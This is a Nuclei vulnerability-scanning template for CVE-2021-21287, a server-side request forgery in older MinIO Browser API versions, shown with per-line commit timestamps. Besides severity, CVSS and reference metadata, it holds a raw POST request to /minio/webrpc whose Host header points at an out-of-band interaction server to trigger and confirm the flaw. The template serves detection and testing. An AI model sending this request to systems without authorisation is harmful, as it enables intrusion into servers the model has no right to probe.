2021-09-14 10:31:27 +00:00
|
|
|
id: CVE-2021-21287
|
|
|
|
|
|
|
|
info:
|
2022-06-27 17:29:18 +00:00
|
|
|
name: MinIO Browser API - Server-Side Request Forgery
|
2021-09-14 10:31:27 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
2022-06-27 18:37:25 +00:00
|
|
|
description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patches or updates provided by MinIO to fix this vulnerability.
|
2021-09-14 11:22:28 +00:00
|
|
|
reference:
|
2021-09-14 14:45:44 +00:00
|
|
|
- https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
|
2021-09-14 10:31:27 +00:00
|
|
|
- https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://github.com/minio/minio/pull/11337
|
2022-06-27 17:29:18 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-21287
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://github.com/minio/minio/commit/eb6871ecd960d570f70698877209e6db181bf276
|
2021-09-14 15:20:20 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.7
|
2021-09-14 15:20:20 +00:00
|
|
|
cve-id: CVE-2021-21287
|
|
|
|
cwe-id: CWE-918
|
2023-11-14 05:56:48 +00:00
|
|
|
epss-score: 0.97169
|
2023-11-14 14:37:18 +00:00
|
|
|
epss-percentile: 0.99757
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: minio
|
|
|
|
product: minio
|
|
|
|
tags: cve,cve2021,minio,ssrf,oast
|
2021-09-14 10:31:27 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-09-14 14:45:44 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /minio/webrpc HTTP/1.1
|
|
|
|
Host: {{interactsh-url}}
|
|
|
|
Content-Type: application/json
|
2021-09-14 15:17:58 +00:00
|
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
|
|
|
|
Content-Length: 76
|
2021-09-14 11:22:28 +00:00
|
|
|
|
2021-09-14 14:45:44 +00:00
|
|
|
{"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"}
|
2021-09-14 10:31:27 +00:00
|
|
|
|
2021-09-14 14:45:44 +00:00
|
|
|
matchers-condition: and
|
2021-09-14 10:31:27 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
|
|
|
words:
|
2021-09-14 15:17:58 +00:00
|
|
|
- "http" # Confirms the HTTP Interaction
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
2022-06-27 17:29:18 +00:00
|
|
|
- "We encountered an internal error"
|
2023-11-14 16:39:03 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022100bbcb1f4a6c50dac5fca14298fce993b0de685c67da83b1ada44c0f5095e012d302205bb5055b77d5103b3ba0a6a7bf18877a761546860179d81007a4e7064edcf27f:922c64590222798bb761d5b6d8e72950
|